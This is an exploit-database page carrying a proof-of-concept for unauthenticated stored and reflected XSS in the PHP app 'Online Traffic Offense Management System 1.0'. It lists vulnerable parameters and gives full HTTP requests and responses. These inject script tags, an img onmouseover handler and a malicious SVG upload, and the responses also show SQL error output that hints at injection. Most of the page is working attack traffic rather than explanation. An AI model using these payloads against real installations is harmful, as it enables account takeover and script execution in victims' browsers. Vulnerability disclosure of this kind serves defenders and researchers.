Online traffic offense management system 1.0 multiple xss (unauthenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-10-07 | Type : webapps | Platform : php
This exploit / vulnerability Online traffic offense management system 1.0 multiple xss (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Stored and XSS Reflected

# All requests can be sent by both an authenticated and a non-authenticated user

# XSS Stored - example vulnerable pages and parameters:

* The entire application is susceptible to Stored XSS vulnerabilities, below are examples of pages and parameters
* We can upload SVG file from XSS to all places in webapp
* We can add evil code from admin account, regular user account and unauthenticated - we needs only request

* http://localhost/traffic_offense/admin/?page=user
Parameters:
- firstname
- lastname
- user image - svg file with javascript code - XSS

* http://localhost/traffic_offense/classes/Master.php?f=save_offense_record
Parameters:
- date_created
- ticket_no
- officer_id
- officer_name
- status
- remarks
- SVG file with javascript code - XSS

* All application is vulnerable

# XSS Reflected - example vulnerable pages and parameters:

* http://localhost/traffic_offense/admin/?page
Parameters:
- page

* http://localhost/traffic_offense/classes/Login.php
Parameters:
- username
- password

* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
Parameters:
- id

* http://localhost/traffic_offense/classes/Master.php
Parameters:
- id

* http://localhost/traffic_offense/classes/Users.php
Parameters:
- id

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1 - XSS Reflected

# Request using POST method, payload is in the parameter value id

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583
Content-Length: 1061
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------21986352462593413643786432583
Content-Disposition: form-data; name="id"

13<script>alert(1)</script>37
-----------------------------21986352462593413643786432583
Content-Disposition: form-data; name="firstname"

hacked
[...]

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 01:05:26 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 186
Connection: close
Content-Type: text/html; charset=UTF-8

UPDATE users set firstname = 'sdasfd' , lastname = 'fdxfd' , username = 'test2' , `password` = 'ad0234829205b9033196ba818f7a872b' where id = 13<script>alert(1)</script>37

-----------------------------------------------------------------------------------------------------------------------
# Request using GET method, payload is in the parameter value id

GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:28:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7893
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1
SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37'' <br />
[...]

-----------------------------------------------------------------------------------------------------------------------

## Example 2

# XSS Stored

# Save JS payload in user profile and add SVG file from vuln script

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102
Content-Length: 4304
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="id"

1
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="firstname"

admin"/><img src=x onmouseover=alert(1)>
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="lastname"

admin"/><img src=x onmouseover=alert(1)>
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="username"

admin
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="password"

admnin123
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

[...]SVG PAYLOAD[...]


-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:31:29 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------
# Request download new user data

GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:42:04 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24719
[...]
<div class="form-group col-6">
<label for="name">First Name</label>
<input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
</div>
<div class="form-group col-6">
<label for="name">Last Name</label>
<input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
</div>
[...]
<div class="form-group col-6 d-flex justify-content-center">
<img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail">
</div>
[...]

Online traffic offense management system 1.0 multiple xss (unauthenticated)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Online traffic offense management system 1.0 multiple xss (unauthenticated) Vulnerability / Exploit